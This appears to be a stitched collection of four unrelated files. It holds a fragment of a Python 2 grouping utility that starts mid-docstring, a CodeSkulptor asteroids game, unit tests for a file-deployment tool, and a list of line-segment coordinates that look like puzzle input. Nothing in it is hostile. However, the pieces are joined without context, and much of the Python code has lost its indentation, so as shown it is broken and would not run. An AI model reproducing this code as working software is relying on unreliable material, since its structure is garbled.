group : array, integer
assumed to be consecutive integers
no dtype checking because I want to raise in that case
uses loop over columns of x
for comparison, simple python loop
'''
x = np.asarray(x)
if x.ndim == 1:
x = x[:,None]
elif x.ndim > 2 and use_bincount:
raise ValueError('not implemented yet')
if use_bincount:
return np.array([np.bincount(group, weights=x[:,col])
for col in range(x.shape[1])])
else:
uniques = np.unique(group)
result = np.zeros([len(uniques)] + list(x.shape[1:]))
for ii, cat in enumerate(uniques):
            result[ii] = x[group==cat].sum(0)
return result
def group_sums_dummy(x, group_dummy):
'''sum by groups given group dummy variable
group_dummy can be either ndarray or sparse matrix
'''
if type(group_dummy) is np.ndarray:
return np.dot(x.T, group_dummy)
else: #check for sparse
return x.T * group_dummy
def dummy_sparse(groups):
'''create a sparse indicator from a group array with integer labels
Parameters
----------
groups: ndarray, int, 1d (nobs,)
an array of group indicators for each observation. Group levels are assumed
to be defined as consecutive integers, i.e. range(n_groups) where
n_groups is the number of group levels. A group level with no
observations for it will still produce a column of zeros.
Returns
-------
indi : ndarray, int8, 2d (nobs, n_groups)
an indicator array with one row per observation, that has 1 in the
column of the group level for that observation
Examples
--------
>>> g = np.array([0, 0, 2, 1, 1, 2, 0])
>>> indi = dummy_sparse(g)
>>> indi
<7x3 sparse matrix of type '<type 'numpy.int8'>'
with 7 stored elements in Compressed Sparse Row format>
>>> indi.todense()
matrix([[1, 0, 0],
[1, 0, 0],
[0, 0, 1],
[0, 1, 0],
[0, 1, 0],
[0, 0, 1],
[1, 0, 0]], dtype=int8)
current behavior with missing groups
>>> g = np.array([0, 0, 2, 0, 2, 0])
>>> indi = dummy_sparse(g)
>>> indi.todense()
matrix([[1, 0, 0],
[1, 0, 0],
[0, 0, 1],
[1, 0, 0],
[0, 0, 1],
[1, 0, 0]], dtype=int8)
'''
from scipy import sparse
indptr = np.arange(len(groups)+1)
data = np.ones(len(groups), dtype=np.int8)
    indi = sparse.csr_matrix((data, groups, indptr))
return indi
class Group(object):
def __init__(self, group, name=''):
        self.group = np.asarray(group) #TODO: use checks in combine_indices
self.name = name
uni, uni_idx, uni_inv = combine_indices(group)
#TODO: rename these to something easier to remember
self.group_int, self.uni_idx, self.uni = uni, uni_idx, uni_inv
self.n_groups = len(self.uni)
#put this here so they can be overwritten before calling labels
self.separator = '.'
self.prefix = self.name
if self.prefix:
self.prefix = self.prefix + '='
#cache decorator
def counts(self):
return np.bincount(self.group_int)
#cache_decorator
def labels(self):
#is this only needed for product of groups (intersection)?
prefix = self.prefix
uni = self.uni
sep = self.separator
if uni.ndim > 1:
label = [(prefix+sep.join(['%s']*len(uni[0]))) % tuple(ii)
for ii in uni]
else:
label = [prefix + '%s' % ii for ii in uni]
return label
def dummy(self, drop_idx=None, sparse=False, dtype=int):
'''
drop_idx is only available if sparse=False
drop_idx is supposed to index into uni
'''
uni = self.uni
if drop_idx is not None:
idx = range(len(uni))
del idx[drop_idx]
uni = uni[idx]
group = self.group
if not sparse:
return (group[:,None] == uni[None,:]).astype(dtype)
else:
return dummy_sparse(self.group_int)
def interaction(self, other):
if isinstance(other, self.__class__):
other = other.group
return self.__class__((self, other))
def group_sums(self, x, use_bincount=True):
return group_sums(x, self.group_int, use_bincount=use_bincount)
    def group_demean(self, x, use_bincount=True):
        nobs = float(len(x))
        means_g = group_sums(x / nobs, self.group_int,
                             use_bincount=use_bincount)
        x_demeaned = x - means_g[self.group_int] #check reverse_index?
        return x_demeaned, means_g
class GroupSorted(Group):
def __init__(self, group, name=''):
super(self.__class__, self).__init__(group, name=name)
idx = (np.nonzero(np.diff(group))[0]+1).tolist()
self.groupidx = groupidx = zip([0]+idx, idx+[len(group)])
        self.ngroups = len(groupidx)
def group_iter(self):
for low, upp in self.groupidx:
yield slice(low, upp)
def lag_indices(self, lag):
'''return the index array for lagged values
Warning: if k is larger then the number of observations for an
individual, then no values for that individual are returned.
TODO: for the unbalanced case, I should get the same truncation for
the array with lag=0. From the return of lag_idx we wouldn't know
which individual is missing.
TODO: do I want the full equivalent of lagmat in tsa?
maxlag or lag or lags.
not tested yet
'''
lag_idx = np.asarray(self.groupidx)[:,1] - lag #asarray or already?
        low = np.asarray(self.groupidx)[:,0]  #first index of each group
        mask_ok = (low <= lag_idx)
#still an observation that belongs to the same individual
return lag_idx[mask_ok]
if __name__ == '__main__':
#---------- examples combine_indices
from numpy.testing import assert_equal
np.random.seed(985367)
groups = np.random.randint(0,2,size=(10,2))
uv, ux, u, label = combine_indices(groups, return_labels=True)
uv, ux, u, label = combine_indices(groups, prefix='g1,g2=', sep=',',
return_labels=True)
group0 = np.array(['sector0', 'sector1'])[groups[:,0]]
group1 = np.array(['region0', 'region1'])[groups[:,1]]
uv, ux, u, label = combine_indices((group0, group1),
prefix='sector,region=',
sep=',',
return_labels=True)
uv, ux, u, label = combine_indices((group0, group1), prefix='', sep='.',
return_labels=True)
group_joint = np.array(label)[uv]
group_joint_expected = np.array(
['sector1.region0', 'sector0.region1', 'sector0.region0',
'sector0.region1', 'sector1.region1', 'sector0.region0',
'sector1.region0', 'sector1.region0', 'sector0.region1',
'sector0.region0'],
dtype='|S15')
assert_equal(group_joint, group_joint_expected)
'''
>>> uv
array([2, 1, 0, 0, 1, 0, 2, 0, 1, 0])
>>> label
['sector0.region0', 'sector1.region0', 'sector1.region1']
>>> np.array(label)[uv]
array(['sector1.region1', 'sector1.region0', 'sector0.region0',
'sector0.region0', 'sector1.region0', 'sector0.region0',
'sector1.region1', 'sector0.region0', 'sector1.region0',
'sector0.region0'],
dtype='|S15')
>>> np.column_stack((group0, group1))
array([['sector1', 'region1'],
['sector1', 'region0'],
['sector0', 'region0'],
['sector0', 'region0'],
['sector1', 'region0'],
['sector0', 'region0'],
['sector1', 'region1'],
['sector0', 'region0'],
['sector1', 'region0'],
['sector0', 'region0']],
dtype='|S7')
'''
#------------- examples sparse_dummies
from scipy import sparse
g = np.array([0, 0, 1, 2, 1, 1, 2, 0])
u = range(3)
indptr = np.arange(len(g)+1)
data = np.ones(len(g), dtype=np.int8)
a = sparse.csr_matrix((data, g, indptr))
print a.todense()
print np.all(a.todense() == (g[:,None] == np.arange(3)).astype(int))
x = np.arange(len(g)*3).reshape(len(g), 3, order='F')
print 'group means'
print x.T * a
print np.dot(x.T, g[:,None] == np.arange(3))
print np.array([np.bincount(g, weights=x[:,col]) for col in range(3)])
for cat in u:
print x[g==cat].sum(0)
for cat in u: x[g==cat].sum(0)
cc = sparse.csr_matrix([[0, 1, 0, 1, 0, 0, 0, 0, 0],
[1, 0, 1, 0, 1, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 1, 0, 0, 0],
[1, 0, 0, 0, 1, 0, 1, 0, 0],
[0, 1, 0, 1, 0, 1, 0, 1, 0],
[0, 0, 1, 0, 1, 0, 0, 0, 1],
[0, 0, 0, 1, 0, 0, 0, 1, 0],
[0, 0, 0, 0, 1, 0, 1, 0, 1],
[0, 0, 0, 0, 0, 1, 0, 1, 0]])
#------------- groupsums
print group_sums(np.arange(len(g)*3*2).reshape(len(g),3,2), g,
use_bincount=False).T
print group_sums(np.arange(len(g)*3*2).reshape(len(g),3,2)[:,:,0], g)
print group_sums(np.arange(len(g)*3*2).reshape(len(g),3,2)[:,:,1], g)
#------------- examples class
x = np.arange(len(g)*3).reshape(len(g), 3, order='F')
mygroup = Group(g)
print mygroup.group_int
print mygroup.group_sums(x)
print mygroup.labels()
|
|
# implementation of Spaceship - program template for RiceRocks
import simplegui
import math
import random
# globals for user interface
WIDTH = 800
HEIGHT = 600
score = 0
lives = 3
time = 0
started = False
class ImageInfo:
def __init__(self, center, size, radius = 0, lifespan = None, animated = False):
self.center = center
self.size = size
self.radius = radius
if lifespan:
self.lifespan = lifespan
else:
self.lifespan = float('inf')
self.animated = animated
def get_center(self):
return self.center
def get_size(self):
return self.size
def get_radius(self):
return self.radius
def get_lifespan(self):
return self.lifespan
def get_animated(self):
return self.animated
# art assets created by Kim Lathrop, may be freely re-used in non-commercial projects, please credit Kim
# debris images - debris1_brown.png, debris2_brown.png, debris3_brown.png, debris4_brown.png
# debris1_blue.png, debris2_blue.png, debris3_blue.png, debris4_blue.png, debris_blend.png
debris_info = ImageInfo([320, 240], [640, 480])
debris_image = simplegui.load_image("http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/debris2_blue.png")
# nebula images - nebula_brown.png, nebula_blue.png
nebula_info = ImageInfo([400, 300], [800, 600])
nebula_image = simplegui.load_image("http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/nebula_blue.f2013.png")
# splash image
splash_info = ImageInfo([200, 150], [400, 300])
splash_image = simplegui.load_image("http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/splash.png")
# ship image
ship_info = ImageInfo([45, 45], [90, 90], 35)
ship_image = simplegui.load_image("http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/double_ship.png")
# missile image - shot1.png, shot2.png, shot3.png
missile_info = ImageInfo([5,5], [10, 10], 3, 50)
missile_image = simplegui.load_image("http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/shot2.png")
# asteroid images - asteroid_blue.png, asteroid_brown.png, asteroid_blend.png
asteroid_info = ImageInfo([45, 45], [90, 90], 40)
asteroid_image = simplegui.load_image("http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/asteroid_blue.png")
# animated explosion - explosion_orange.png, explosion_blue.png, explosion_blue2.png, explosion_alpha.png
explosion_info = ImageInfo([64, 64], [128, 128], 17, 24, True)
explosion_image = simplegui.load_image("http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/explosion_alpha.png")
# sound assets purchased from sounddogs.com, please do not redistribute
# .ogg versions of sounds are also available, just replace .mp3 by .ogg
soundtrack = simplegui.load_sound("http://commondatastorage.googleapis.com/codeskulptor-assets/sounddogs/soundtrack.mp3")
missile_sound = simplegui.load_sound("http://commondatastorage.googleapis.com/codeskulptor-assets/sounddogs/missile.mp3")
missile_sound.set_volume(.5)
ship_thrust_sound = simplegui.load_sound("http://commondatastorage.googleapis.com/codeskulptor-assets/sounddogs/thrust.mp3")
explosion_sound = simplegui.load_sound("http://commondatastorage.googleapis.com/codeskulptor-assets/sounddogs/explosion.mp3")
# helper functions to handle transformations
def angle_to_vector(ang):
return [math.cos(ang), math.sin(ang)]
def dist(p, q):
return math.sqrt((p[0] - q[0]) ** 2 + (p[1] - q[1]) ** 2)
# Ship class
class Ship:
def __init__(self, pos, vel, angle, image, info):
self.pos = [pos[0], pos[1]]
self.vel = [vel[0], vel[1]]
self.thrust = False
self.angle = angle
self.angle_vel = 0
self.image = image
self.image_center = info.get_center()
self.image_size = info.get_size()
self.radius = info.get_radius()
def draw(self,canvas):
if self.thrust:
canvas.draw_image(self.image, [self.image_center[0] + self.image_size[0], self.image_center[1]] , self.image_size,
self.pos, self.image_size, self.angle)
else:
canvas.draw_image(self.image, self.image_center, self.image_size,
self.pos, self.image_size, self.angle)
# canvas.draw_circle(self.pos, self.radius, 1, "White", "White")
def update(self):
# update angle
self.angle += self.angle_vel
# update position
self.pos[0] = (self.pos[0] + self.vel[0]) % WIDTH
self.pos[1] = (self.pos[1] + self.vel[1]) % HEIGHT
# update velocity
if self.thrust:
acc = angle_to_vector(self.angle)
self.vel[0] += acc[0] * .1
self.vel[1] += acc[1] * .1
self.vel[0] *= .99
self.vel[1] *= .99
def set_thrust(self, on):
self.thrust = on
if on:
ship_thrust_sound.rewind()
ship_thrust_sound.play()
else:
ship_thrust_sound.pause()
def increment_angle_vel(self):
self.angle_vel += .05
def decrement_angle_vel(self):
self.angle_vel -= .05
def shoot(self):
global missile_group
forward = angle_to_vector(self.angle)
missile_pos = [self.pos[0] + self.radius * forward[0], self.pos[1] + self.radius * forward[1]]
missile_vel = [self.vel[0] + 6 * forward[0], self.vel[1] + 6 * forward[1]]
missile_group.add(Sprite(missile_pos, missile_vel, self.angle, 0, missile_image, missile_info, missile_sound))
def get_position(self):
return self.pos
def get_radius(self):
return self.radius
# Sprite class
class Sprite:
def __init__(self, pos, vel, ang, ang_vel, image, info, sound = None):
self.pos = [pos[0],pos[1]]
self.vel = [vel[0],vel[1]]
self.angle = ang
self.angle_vel = ang_vel
self.image = image
self.image_center = info.get_center()
self.image_size = info.get_size()
self.radius = info.get_radius()
self.lifespan = info.get_lifespan()
self.animated = info.get_animated()
self.age = 0
if sound:
sound.rewind()
sound.play()
def draw(self, canvas):
canvas.draw_image(self.image, self.image_center, self.image_size,
self.pos, self.image_size, self.angle)
def update(self):
# update angle
self.angle += self.angle_vel
# update position
self.pos[0] = (self.pos[0] + self.vel[0]) % WIDTH
self.pos[1] = (self.pos[1] + self.vel[1]) % HEIGHT
# update age
self.age += 1
if self.age >= self.lifespan:
return True
else:
return False
def collide(self, other_object):
other_position = other_object.get_position()
other_radius = other_object.get_radius()
if dist(self.pos, other_position) <= self.radius + other_radius:
return True
else:
return False
def get_position(self):
return self.pos
def get_radius(self):
return self.radius
# key handlers to control ship
def keydown(key):
if key == simplegui.KEY_MAP['left']:
my_ship.decrement_angle_vel()
elif key == simplegui.KEY_MAP['right']:
my_ship.increment_angle_vel()
elif key == simplegui.KEY_MAP['up']:
my_ship.set_thrust(True)
elif key == simplegui.KEY_MAP['space']:
my_ship.shoot()
def keyup(key):
if key == simplegui.KEY_MAP['left']:
my_ship.increment_angle_vel()
elif key == simplegui.KEY_MAP['right']:
my_ship.decrement_angle_vel()
elif key == simplegui.KEY_MAP['up']:
my_ship.set_thrust(False)
# mouseclick handlers that reset UI and conditions whether splash image is drawn
def click(pos):
global started
center = [WIDTH / 2, HEIGHT / 2]
size = splash_info.get_size()
inwidth = (center[0] - size[0] / 2) < pos[0] < (center[0] + size[0] / 2)
inheight = (center[1] - size[1] / 2) < pos[1] < (center[1] + size[1] / 2)
if (not started) and inwidth and inheight:
started = True
def draw(canvas):
    global time, started, rock_group, score, lives
    # check for rock collisions with ship
    ship_collision = group_collide(rock_group, my_ship)
    if ship_collision:
        lives -= 1
if lives == 0:
started = False
rock_group = set([])
lives = 3
score = 0
# check for missile collisions with rocks
missile_collision = group_group_collide(rock_group, missile_group)
score += missile_collision
# animate background
time += 1
wtime = (time / 4) % WIDTH
center = debris_info.get_center()
size = debris_info.get_size()
canvas.draw_image(nebula_image, nebula_info.get_center(), nebula_info.get_size(), [WIDTH / 2, HEIGHT / 2], [WIDTH, HEIGHT])
canvas.draw_image(debris_image, center, size, (wtime - WIDTH / 2, HEIGHT / 2), (WIDTH, HEIGHT))
canvas.draw_image(debris_image, center, size, (wtime + WIDTH / 2, HEIGHT / 2), (WIDTH, HEIGHT))
# draw UI
canvas.draw_text("Lives", [50, 50], 22, "White")
canvas.draw_text("Score", [680, 50], 22, "White")
canvas.draw_text(str(lives), [50, 80], 22, "White")
canvas.draw_text(str(score), [680, 80], 22, "White")
# draw ship
my_ship.draw(canvas)
# update ship
my_ship.update()
#draw and update sprite groups
process_sprite_group(rock_group, canvas)
process_sprite_group(missile_group, canvas)
# draw splash screen if not started
if not started:
canvas.draw_image(splash_image, splash_info.get_center(),
splash_info.get_size(), [WIDTH / 2, HEIGHT / 2],
splash_info.get_size())
# timer handler that spawns a rock
def rock_spawner():
global rock_group
if started and len(rock_group) <= 8:
rock_pos = [random.randrange(0, WIDTH), random.randrange(0, HEIGHT)]
rock_vel = [random.random() * .6 - .3, random.random() * .6 - .3]
rock_avel = random.random() * .2 - .1
a_rock = Sprite(rock_pos, rock_vel, 0, rock_avel, asteroid_image, asteroid_info)
if dist(rock_pos, my_ship.get_position()) > my_ship.get_radius():
rock_group.add(a_rock)
# helper function to update/draw a group of sprites
def process_sprite_group(a_set, a_canvas):
removed_sprites = set([])
for sprite in a_set:
sprite.draw(a_canvas)
aged_out = sprite.update()
        if aged_out:
removed_sprites.add(sprite)
a_set.difference_update(removed_sprites)
# helper function to determine whether any items in a set
# have collided with another object
def group_collide(group, other_object):
remove_group = set([])
for item in group:
if item.collide(other_object):
remove_group.add(item)
if len(remove_group) > 0:
group.difference_update(remove_group)
return True
else:
return False
# helper function for detecting missile/rock collisions
def group_group_collide(group1, group2):
deleted_items = set([])
total = 0
for item in group1:
if group_collide(group2, item):
deleted_items.add(item)
total += 1
group1.difference_update(deleted_items)
return total
# initialize stuff
frame = simplegui.create_frame("Asteroids", WIDTH, HEIGHT)
# initialize ship and two sprites
my_ship = Ship([WIDTH / 2, HEIGHT / 2], [0, 0], 0, ship_image, ship_info)
rock_group = set([])
missile_group = set([])
# register handlers
frame.set_keyup_handler(keyup)
frame.set_keydown_handler(keydown)
frame.set_mouseclick_handler(click)
frame.set_draw_handler(draw)
timer = simplegui.create_timer(1000.0, rock_spawner)
# get things rolling
timer.start()
frame.start()
|
|
#!/usr/bin/env python3
import io
import json
import logging
import os
import sys
import tarfile
import tempfile
import unittest
sys.path.append(os.path.dirname(os.path.dirname(__file__)))
from src import Application, Logger, load
def _get_json(obj):
return json.dumps(obj).encode('utf-8')
class ApplicationTester(unittest.TestCase):
def setUp(self):
self.directory = tempfile.TemporaryDirectory()
def tearDown(self):
self.directory.cleanup()
def assert_file(self, name, expect_exists=None, expect_chmod=None):
path = os.path.join(self.directory.name, name)
if expect_exists is not None:
self.assertTrue(os.path.exists(path))
with open(path, 'rb') as file:
data = file.read()
self.assertEqual(data, expect_exists)
if expect_chmod is not None:
stat = os.stat(path)
self.assertEqual(stat.st_mode & 0o777, expect_chmod)
else:
self.assertFalse(os.path.exists(path))
def create_directory(self, name):
path = os.path.join(self.directory.name, name)
os.makedirs(path, exist_ok=True)
return path
def create_file(self, name, data):
path = os.path.join(self.directory.name, name)
os.makedirs(os.path.dirname(path), exist_ok=True)
with open(path, 'wb') as file:
file.write(data)
return path
def delete_file(self, name):
path = os.path.join(self.directory.name, name)
if os.path.exists(path):
os.remove(path)
def deploy(self, config, location_names):
logger = Logger.build(logging.WARNING, False)
application = Application(logger, True)
definition = load(logger, self.directory.name, config)
self.assertFalse(definition is None)
self.assertTrue(application.run(definition, location_names, [], [], None, None))
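    # Each test below builds a small project inside a temporary directory:
    # ".creep.def" describes what to deploy (origin, cascades, modifiers) and
    # ".creep.env" maps location names such as "default" to a connection URL,
    # here always a local "file:///" target so results can be asserted on disk.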
def test_deploy_from_archive(self):
archive = self.create_file('archive.tar', b'')
data = b'Some binary contents'
with tarfile.open(archive, 'w') as tar:
info = tarfile.TarInfo('item.bin')
info.size = len(data)
tar.addfile(info, io.BytesIO(initial_bytes=data))
target = self.create_directory('target')
self.create_file('.creep.def', _get_json({"origin": "archive.tar"}))
self.create_file('.creep.env', _get_json({"default": {"connection": "file:///" + target}}))
self.deploy('.', ['default'])
self.assert_file('target/item.bin', data)
def test_deploy_from_archive_with_subdir(self):
archive = self.create_file('archive.tar', b'')
data = b'Some binary contents'
with tarfile.open(archive, 'w') as tar:
info = tarfile.TarInfo('remove/keep/item.bin')
info.size = len(data)
tar.addfile(info, io.BytesIO(initial_bytes=data))
target = self.create_directory('target')
self.create_file('.creep.def', _get_json({"origin": "archive.tar#remove"}))
self.create_file('.creep.env', _get_json({"default": {"connection": "file:///" + target}}))
self.deploy('.', ['default'])
self.assert_file('target/keep/item.bin', data)
def test_deploy_from_directory_then_append(self):
self.create_directory('target')
self.create_file('source/.creep.env', _get_json({"default": {"connection": "file:///../target"}}))
# Create first file and deploy
self.create_file('source/a/a', b'a')
self.deploy('source', ['default'])
self.assert_file('target/a/a', b'a')
# Create second file and deploy
self.create_file('source/b/b', b'b')
self.deploy('source', ['default'])
self.assert_file('target/a/a', b'a')
self.assert_file('target/b/b', b'b')
def test_deploy_from_directory_then_delete(self):
self.create_directory('target')
self.create_file('source/.creep.env', _get_json({"default": {"connection": "file:///../target"}}))
# Create files and deploy
self.create_file('source/a/a', b'a')
self.create_file('source/b/b', b'b')
self.deploy('source', ['default'])
self.assert_file('target/.creep.env', None)
self.assert_file('target/a/a', b'a')
self.assert_file('target/b/b', b'b')
# Delete one file and deploy
self.delete_file('source/b/b')
self.deploy('source', ['default'])
self.assert_file('target/.creep.env', None)
self.assert_file('target/a/a', b'a')
self.assert_file('target/b/b')
def test_deploy_from_directory_then_replace(self):
self.create_directory('target')
self.create_file('source/.creep.env', _get_json({"default": {"connection": "file:///../target"}}))
# Create file and deploy
self.create_file('source/a/a', b'a')
self.deploy('source', ['default'])
self.assert_file('target/.creep.env', None)
self.assert_file('target/a/a', b'a')
# Replace file and deploy again
self.create_file('source/a/a', b'aaa')
self.deploy('source', ['default'])
self.assert_file('target/.creep.env', None)
self.assert_file('target/a/a', b'aaa')
def test_deploy_from_directory_with_one_file(self):
self.create_directory('target')
self.create_file('source/.creep.env', _get_json({"default": {"connection": "file:///../target"}}))
self.create_file('source/test', b'Hello, World!')
self.deploy('source', ['default'])
self.assert_file('target/.creep.env', None)
self.assert_file('target/test', b'Hello, World!')
def test_deploy_from_directory_with_tree(self):
self.create_directory('target')
self.create_file('source/.creep.env', _get_json({"default": {"connection": "file:///../target"}}))
self.create_file('source/aaa', b'a')
self.create_file('source/b/bb', b'b')
self.create_file('source/c/c/c', b'c')
self.deploy('source', ['default'])
self.assert_file('target/.creep.env', None)
self.assert_file('target/aaa', b'a')
self.assert_file('target/b/bb', b'b')
self.assert_file('target/c/c/c', b'c')
def test_deploy_from_url(self):
target = self.create_directory('target')
self.create_file(
'.creep.def',
_get_json({
"origin":
"https://gist.github.com/r3c/2004ebb0763a02b5945287f3dfa2e3e2/archive/003650e2639b49edc8c4ff6eb20e0931edb547dc.zip#2004ebb0763a02b5945287f3dfa2e3e2-003650e2639b49edc8c4ff6eb20e0931edb547dc"
}))
self.create_file('.creep.env', _get_json({"default": {"connection": "file:///" + target}}))
self.deploy('.', ['default'])
self.assert_file('target/filename', b'test')
def test_deploy_using_definition_default(self):
self.create_directory('target')
self.create_file('source/.creep.env', _get_json({"default": {"connection": "file:///../target"}}))
self.create_file('source/aaa', b'a')
self.deploy('source', ['default'])
self.assert_file('target/.creep.env', None)
self.assert_file('target/aaa', b'a')
def test_deploy_using_definition_inline(self):
self.create_directory('target')
self.create_file('.creep.env', _get_json({"default": {"connection": "file:///../target"}}))
self.create_file('source/aaa', b'a')
self.deploy({"origin": "source"}, ['default'])
self.assert_file('target/aaa', b'a')
def test_deploy_using_definition_path_with_cascade_inline(self):
self.create_directory('target1')
self.create_directory('target2')
self.create_file(
'source1/.creep.def',
_get_json({
"cascades": [{
"environment": {
"default": {
"connection": "file:///../target2"
}
},
"modifiers": [{
"pattern": "^c$",
"filter": ""
}],
"origin": "../source2"
}],
"environment": {
"default": {
"connection": "file:///../target1"
}
}
}))
self.create_file('source1/a', b'a')
self.create_file('source2/b', b'b')
self.create_file('source2/c', b'c')
self.deploy('source1', ['default'])
self.assert_file('target1/a', b'a')
self.assert_file('target2/b', b'b')
self.assert_file('target2/c', None)
def test_deploy_using_definition_path_with_cascade_path(self):
self.create_directory('target1')
self.create_directory('target2')
self.create_file(
'source1/.creep.def',
_get_json({
"cascades": ["../source2_def"],
"environment": {
"default": {
"connection": "file:///../target1"
}
}
}))
self.create_file(
'source2_def',
_get_json({
"environment": "source2_env",
"modifiers": [{
"pattern": "^c$",
"filter": ""
}],
"origin": "source2"
}))
self.create_file('source2_env', _get_json({"default": {"connection": "file:///../target2"}}))
self.create_file('source1/a', b'a')
self.create_file('source2/b', b'b')
self.create_file('source2/c', b'c')
self.deploy('source1', ['default'])
self.assert_file('target1/a', b'a')
self.assert_file('target2/b', b'b')
self.assert_file('target2/c', None)
def test_deploy_using_definition_path_with_cascade_tree(self):
self.create_directory('target')
self.create_file('source/.creep.def', _get_json({"cascades": ["a"], "environment": {"default": {}}}))
self.create_file('source/a/.creep.def', _get_json({"cascades": ["b"], "environment": {"default": {}}}))
self.create_file('source/a/b/.creep.env', _get_json({"default": {"connection": "file:///../../../target"}}))
self.create_file('source/a/b/c', b'c')
self.deploy('source', ['default'])
self.assert_file('target/.creep.def', None)
self.assert_file('target/a/.creep.def', None)
self.assert_file('target/a/b/.creep.env', None)
self.assert_file('target/c', b'c')
def test_deploy_using_definition_path_with_modifier_chmod(self):
self.create_directory('target')
self.create_file(
'source/.creep.def',
_get_json({
"environment": {
"default": {
"connection": "file:///../target"
}
},
"modifiers": [{
"pattern": "^.$",
"chmod": "751"
}]
}))
self.create_file('target/.creep.rev', _get_json({"default": {"a": "dummy", "b": "dummy"}}))
self.create_file('source/a', b'a')
self.create_file('target/b', b'b')
self.deploy('source', ['default'])
self.assert_file('target/.creep.def', None)
self.assert_file('target/a', b'a', 0o751)
self.assert_file('target/b')
def test_deploy_using_definition_path_with_modifier_filter_false(self):
self.create_directory('target')
self.create_file(
'source/.creep.def',
_get_json({
"environment": {
"default": {
"connection": "file:///../target"
}
},
"modifiers": [{
"pattern": "^bbb$",
"filter": ""
}]
}))
self.create_file('source/aaa', b'a')
self.create_file('source/bbb', b'b')
self.deploy('source', ['default'])
self.assert_file('target/.creep.def', None)
self.assert_file('target/aaa', b'a')
self.assert_file('target/bbb')
def test_deploy_using_definition_path_with_modifier_filter_grep(self):
self.create_directory('target')
self.create_file(
'source/.creep.def',
_get_json({
"environment": {
"default": {
"connection": "file:///../target"
}
},
"modifiers": [{
"pattern": "^...$",
"filter": "grep -q b '{}'"
}]
}))
self.create_file('source/aaa', b'a')
self.create_file('source/bbb', b'b')
self.deploy('source', ['default'])
self.assert_file('target/.creep.def', None)
self.assert_file('target/aaa', None)
self.assert_file('target/bbb', b'b')
def test_deploy_using_definition_path_with_modifier_link(self):
self.create_directory('target')
self.create_file(
'source/.creep.def',
_get_json({
"environment": {
"default": {
"connection": "file:///../target"
}
},
"modifiers": [{
"pattern": "^list$",
"filter": "",
"link": "cat '{}'"
}]
}))
self.create_file('source/list', b'x\ny\n')
self.create_file('source/x', b'x')
self.create_file('source/y', b'y')
self.deploy('source', ['default'])
# FIXME: x and y would have been transferred anyway; fix test so they're ignored by default
self.assert_file('target/.creep.def', None)
self.assert_file('target/x', b'x')
self.assert_file('target/y', b'y')
def test_deploy_using_definition_path_with_modifier_modify(self):
self.create_directory('target')
self.create_file(
'source/.creep.def',
_get_json({
"environment": {
"default": {
"connection": "file:///../target"
}
},
"modifiers": [{
"pattern": "^...$",
"modify": "sed -r 's/a/b/g' '{}'"
}]
}))
self.create_file('source/aaa', b'aaa')
self.create_file('source/bbb', b'bbb')
self.deploy('source', ['default'])
self.assert_file('target/.creep.def', None)
self.assert_file('target/aaa', b'bbb')
self.assert_file('target/bbb', b'bbb')
def test_deploy_using_definition_path_with_modifier_rename(self):
self.create_directory('target')
self.create_file(
'source/.creep.def',
_get_json({
"environment": {
"default": {
"connection": "file:///../target"
}
},
"modifiers": [{
"pattern": "^(...)$",
"rename": "r_\\1"
}]
}))
self.create_file('source/aaa', b'a')
self.create_file('source/bbb', b'b')
self.deploy('source', ['default'])
self.assert_file('target/.creep.def', None)
self.assert_file('target/r_aaa', b'a')
self.assert_file('target/r_bbb', b'b')
def test_deploy_using_environment_inline(self):
self.create_directory('target')
self.create_file('source/.creep.def',
_get_json({"environment": {
"default": {
"connection": "file:///../target"
}
}}))
self.create_file('source/aaa', b'a')
self.deploy('source', ['default'])
self.assert_file('target/.creep.env', None)
self.assert_file('target/aaa', b'a')
def test_deploy_using_environment_path(self):
self.create_directory('target')
self.create_file('source/.creep.def', _get_json({"environment": ".test.env"}))
self.create_file('source/.test.env', _get_json({"default": {"connection": "file:///../target"}}))
self.create_file('source/aaa', b'a')
self.deploy('source/.creep.def', ['default'])
self.assert_file('target/.creep.def', None)
self.assert_file('target/.test.env', None)
self.assert_file('target/aaa', b'a')
if __name__ == '__main__':
unittest.main()
|
|
62,963 -> 844,181
58,85 -> 917,944
137,76 -> 137,347
453,125 -> 347,19
178,65 -> 977,864
447,360 -> 62,745
723,326 -> 156,893
47,497 -> 107,437
387,491 -> 340,491
58,477 -> 283,252
86,351 -> 562,827
215,172 -> 539,172
496,801 -> 496,63
546,412 -> 232,98
621,807 -> 481,807
471,20 -> 618,20
175,283 -> 175,467
19,283 -> 19,290
159,137 -> 159,11
593,181 -> 543,181
167,976 -> 929,976
730,782 -> 959,782
713,285 -> 713,880
583,144 -> 583,296
39,61 -> 961,983
778,81 -> 604,81
70,560 -> 70,889
85,129 -> 666,710
689,688 -> 632,688
76,52 -> 903,879
510,543 -> 22,55
510,935 -> 470,935
780,357 -> 780,602
440,349 -> 710,79
934,801 -> 412,801
979,25 -> 35,969
379,527 -> 379,76
243,524 -> 243,664
534,945 -> 11,422
198,367 -> 224,367
871,451 -> 456,451
226,231 -> 939,231
686,354 -> 740,300
543,68 -> 340,68
506,160 -> 319,347
177,25 -> 177,603
337,450 -> 724,450
421,519 -> 676,519
858,976 -> 179,297
236,222 -> 236,250
254,242 -> 254,626
859,243 -> 23,243
89,982 -> 979,92
58,758 -> 101,801
930,483 -> 587,826
667,717 -> 667,762
512,816 -> 845,816
17,501 -> 17,760
345,61 -> 847,61
531,840 -> 618,840
67,748 -> 262,748
548,461 -> 163,846
934,142 -> 169,907
119,931 -> 580,470
769,916 -> 457,604
587,458 -> 93,458
109,850 -> 768,191
225,129 -> 160,64
544,163 -> 544,476
304,594 -> 61,351
510,396 -> 510,741
772,210 -> 772,889
867,415 -> 721,269
466,266 -> 466,44
305,609 -> 305,237
563,962 -> 451,962
566,402 -> 28,940
889,717 -> 891,717
754,545 -> 313,545
930,976 -> 209,255
70,911 -> 692,289
737,37 -> 958,37
652,566 -> 720,634
776,551 -> 370,957
484,476 -> 820,476
119,420 -> 639,420
394,964 -> 394,221
340,767 -> 964,143
715,289 -> 481,55
236,389 -> 826,389
747,642 -> 33,642
583,351 -> 244,690
609,17 -> 609,680
460,365 -> 668,365
519,180 -> 929,590
206,45 -> 782,45
507,185 -> 386,306
